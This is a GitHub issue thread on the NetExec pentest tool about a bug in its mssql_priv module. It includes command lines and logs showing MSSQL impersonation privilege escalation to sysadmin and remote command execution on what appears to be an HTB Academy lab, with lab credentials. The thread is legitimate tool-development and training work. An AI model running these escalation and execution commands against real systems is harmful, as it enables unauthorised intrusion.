Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

mssql_priv module can't find any path to privesc #273

Closed
sepauli opened this issue Apr 22, 2024 · 6 comments
Closed

mssql_priv module can't find any path to privesc #273

sepauli opened this issue Apr 22, 2024 · 6 comments
Labels
bug Something isn't working

Comments

@sepauli
Copy link
Contributor

sepauli commented Apr 22, 2024
edited
Loading

Describe the bug
When trying to escalate the privileges via the mssql_priv I get the error "can't find any path to privesc", but it works with exact the same arguments in crackmapexec

To Reproduce

└─$ docker run --network host --rm -it netexec --verbose --debug mssql 10.129.190.104 -u myusername -p 'mysecurepass' -M mssql_priv -o ACTION=privesc
...
[*] Copying default configuration file
[21:15:19] INFO     Socket info: host=10.129.190.104, hostname=10.129.190.104, kerberos=False, ipv6=False, link-local ipv6=False                       connection.py:105
           INFO     NTLM challenge:                                                                                                                         mssql.py:120
                    b'NTLMSSP\x00\x02\x00\x00\x00\x1a\x00\x1a\x008\x00\x00\x00\x05\x02\x89\xa2\xc1\xc8\x94\x9b\xb4\xe1Ti\x00\x00\x00\x00\x00\x00\x00\x00\xb             
                    6\x00\xb6\x00R\x00\x00\x00\n\x00cE\x00\x00\x00\x0fI\x00N\x00L\x00A\x00N\x00E\x00F\x00R\x00E\x00I\x00G\x00H\x00T\x00\x02\x00\x1a\x00I\x0             
                    0N\x00L\x00A\x00N\x00E\x00F\x00R\x00E\x00I\x00G\x00H\x00T\x00\x01\x00\x08\x00D\x00C\x000\x001\x00\x04\x00"\x00i\x00n\x00l\x00a\x00n\x00             
                    e\x00f\x00r\x00e\x00i\x00g\x00h\x00t\x00.\x00h\x00t\x00b\x00\x03\x00,\x00D\x00C\x000\x001\x00.\x00i\x00n\x00l\x00a\x00n\x00e\x00f\x00r\             
                    x00e\x00i\x00g\x00h\x00t\x00.\x00h\x00t\x00b\x00\x05\x00"\x00i\x00n\x00l\x00a\x00n\x00e\x00f\x00r\x00e\x00i\x00g\x00h\x00t\x00.\x00h\x0             
                    0t\x00b\x00\x07\x00\x08\x00\xc2\x9ck\x86\xf9\x94\xda\x01\x00\x00\x00\x00'                                                                           
MSSQL       10.129.190.104  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:mydomain.tld)
           INFO     Encryption required, switching to TLS                                                                                                     tds.py:873
MSSQL       10.129.190.104  1433   DC01             [+] mydomain.tld\myusername:mysecurepass 
MSSQL_PRIV                                          [*] MYDOMAIN\myusername can impersonate: julio
MSSQL_PRIV                                          [*] julio can impersonate: MYDOMAIN\robert
MSSQL_PRIV                                          [-] can't find any path to privesc

When using crackmapexec with it works as expected

└─$ crackmapexec --verbose mssql 10.129.190.104 -u myusername -p mysecurepass -M mssql_priv -o ACTION=privesc
DEBUG:root:Passed args:
{'aesKey': None,
 'clear_obfscripts': False,
 'connectback_host': None,
 'continue_on_success': False,
 'cred_id': [],
 'darrell': False,
 'domain': None,
 'execute': None,
 'export': None,
 'fail_limit': None,
 'force_ps32': False,
 'get_file': None,
 'gfail_limit': None,
 'hash': [],
 'jitter': None,
 'kdcHost': None,
 'kerberos': False,
 'list_modules': False,
 'local_auth': False,
 'module': 'mssql_priv',
 'module_options': ['ACTION=privesc'],
 'mssql_query': None,
 'no_bruteforce': False,
 'no_output': False,
 'obfs': False,
 'password': ['mysecurepass'],
 'port': 1433,
 'protocol': 'mssql',
 'ps_execute': None,
 'put_file': None,
 'server': 'https',
 'server_host': '0.0.0.0',
 'server_port': None,
 'show_module_options': False,
 'target': ['10.129.190.104'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'use_kcache': False,
 'username': ['myusername'],
 'verbose': True}
DEBUG Passed args:
{'aesKey': None,
 'clear_obfscripts': False,
 'connectback_host': None,
 'continue_on_success': False,
 'cred_id': [],
 'darrell': False,
 'domain': None,
 'execute': None,
 'export': None,
 'fail_limit': None,
 'force_ps32': False,
 'get_file': None,
 'gfail_limit': None,
 'hash': [],
 'jitter': None,
 'kdcHost': None,
 'kerberos': False,
 'list_modules': False,
 'local_auth': False,
 'module': 'mssql_priv',
 'module_options': ['ACTION=privesc'],
 'mssql_query': None,
 'no_bruteforce': False,
 'no_output': False,
 'obfs': False,
 'password': ['mysecurepass'],
 'port': 1433,
 'protocol': 'mssql',
 'ps_execute': None,
 'put_file': None,
 'server': 'https',
 'server_host': '0.0.0.0',
 'server_port': None,
 'show_module_options': False,
 'target': ['10.129.190.104'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'use_kcache': False,
 'username': ['myusername'],
 'verbose': True}
DEBUG:asyncio:Using selector: EpollSelector
DEBUG Using selector: EpollSelector
DEBUG:root:Running
DEBUG Running
DEBUG:root:Started thread poller
DEBUG Started thread poller
MSSQL       10.129.190.104  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:mydomain.tld)
INFO:impacket:Encryption required, switching to TLS
DEBUG Encryption required, switching to TLS
DEBUG:root:add_credential(credtype=plaintext, domain=MYDOMAIN, username=myusername, password=mysecurepass, groupid=None, pillaged_from=None) => None
DEBUG add_credential(credtype=plaintext, domain=MYDOMAIN, username=myusername, password=mysecurepass, groupid=None, pillaged_from=None) => None
MSSQL       10.129.190.104  1433   DC01             [+] mydomain.tld\myusername:mysecurepass 
MSSQL_PR... 10.129.190.104  1433   DC01             [+] MYDOMAIN\myusername can impersonate julio (sysadmin)
MSSQL_PR... 10.129.190.104  1433   DC01             [+] MYDOMAIN\myusername is now a sysadmin! (Pwn3d!)
DEBUG:root:Stopped thread poller
DEBUG Stopped thread poller

NetExec info

  • OS: Kali
  • Version of nxc: 1.1.0 - nxc4u - 1f8a0ef
  • Installed from: github
@NeffIsBack NeffIsBack added the bug Something isn't working label Apr 23, 2024
@NeffIsBack
Copy link
Contributor

Not really obvious at first what might be the problem here.
Is this a domain on some htb box or something else where i can debug the bug myself?
Otherwise could you maybe pull down the repo manually, do pipx install . -e --force and checkout the past commits, to see when it worked the last time?
https://github.com/Pennyw0rth/NetExec/commits/main/nxc/modules/mssql_priv.py

@NeffIsBack
Copy link
Contributor

Which cme version is this? Latest from the apt repositories?

@sepauli
Copy link
Contributor Author

sepauli commented Apr 24, 2024

I encountered the error in the HTB Academy module “Using CrackMapExec” in the task “MSSQL Enumeration and Attacks”.
In addition to crackmapexec, I also run the tasks with NetExec.
According to the Discord, other people have also recently run into the error here.

I have tested the older versions/commits of NetExec.
https://github.com/Pennyw0rth/NetExec/commits/main/nxc/modules/mssql_priv.py

I reinstalled the OS once and ran NetExec in a Docker container to avoid any hick up from other programs, unfortunately it does not work.

crackmapexec is the oldest version in the apt repository of kali linux.
Version : 5.4.0
Codename: Indestructible G0thm0g

Unfortunately, I could not find a HTB Box on the HTB Lab with the type of privilege escallation to test.

@NeffIsBack
Copy link
Contributor

Thanks for the info!

@mpgn do you have access to htb academy? Any chance you could take a look at it?

@sepauli sepauli mentioned this issue Apr 26, 2024
Merged
@sepauli
Copy link
Contributor Author

sepauli commented Apr 26, 2024

I found the issue.

The privileged user for the impersonation cannot be found, because there is an issue in the "is_admin_user" function.
Due to the try except statement the admin privileges are always wrong, because the if statement cannot be executed

TypeError: int() argument must be a string, a bytes-like object or a real number, not 'list'

I could sucessfully test my changes.

└─$ docker run --privileged --network host netexec-fixed mssql 10.129.204.177 -u robert -p Inlanefreight01! -M mssql_priv -o ACTION=privesc
...
MSSQL       10.129.204.177  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL       10.129.204.177  1433   DC01             [+] inlanefreight.htb\robert:Inlanefreight01!
MSSQL_PRIV                                          [+] INLANEFREIGHT\robert can impersonate: julio (sysadmin)
MSSQL_PRIV                                          [+] INLANEFREIGHT\robert is now a sysadmin! (Pwn3d!)

└─$ docker run --privileged --network host netexec-fixed mssql 10.129.204.177 -u robert -p Inlanefreight01! -x whoami
...
MSSQL       10.129.204.177  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL       10.129.204.177  1433   DC01             [+] inlanefreight.htb\robert:Inlanefreight01! (Pwn3d!)
MSSQL       10.129.204.177  1433   DC01             [+] Executed command via mssqlexec
MSSQL       10.129.204.177  1433   DC01             inlanefreight\svc_mssql

@NeffIsBack
Copy link
Contributor

Closing as it was fixed in #277

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@sepauli @NeffIsBack